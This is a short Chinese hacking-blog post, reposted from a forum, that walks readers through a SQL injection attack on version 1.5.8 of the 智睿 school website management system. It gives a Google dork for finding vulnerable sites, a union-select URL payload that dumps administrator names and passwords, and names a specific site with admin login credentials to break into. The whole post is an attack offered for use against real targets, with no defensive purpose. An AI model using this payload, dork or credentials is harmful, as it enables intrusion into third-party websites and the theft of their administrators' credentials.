智睿学校网站管理系统V1.5.8注入漏洞

2010, August 24, 8:50 AM. 漏洞分析
Submitted by admin

虽然这个纯文字教程,但是这个漏洞很简单,相信大家一看就会的!

在google里输入关键字:inurl:Seamar.asp

找到网站打开注册用户页面UserReg.asp

比如网站地址为www.123.com 则打开

www.123.com/UserReg.asp 进行注册

注册后输入以下代码(是在网址的后面)

UserAdd.asp?Result=Modify&ID=161 and 1=2 union select 1,2,3,4,adminname,password,7,8,9,10,11,12,13,14,15,16 from zhi_rui_s_manage

比如www.123.com/代码

回车,直接爆出管理用户和密码。

附送一个站吧!

http://www.zhisuo.net    后台自己去找下吧!

账号admin 密码123456
本文来源:落雪网安
原文地址:http://www.hack1994.com/thread-896-1-1.html 转载请说明版权,谢谢您的支持

Tags: 智睿

« 上一篇 | 下一篇 »

只显示10条记录相关文章
智睿管理系统的通杀漏洞 (浏览: 7875, 评论: 0)
智睿网站管理系统通杀0day (浏览: 9521, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):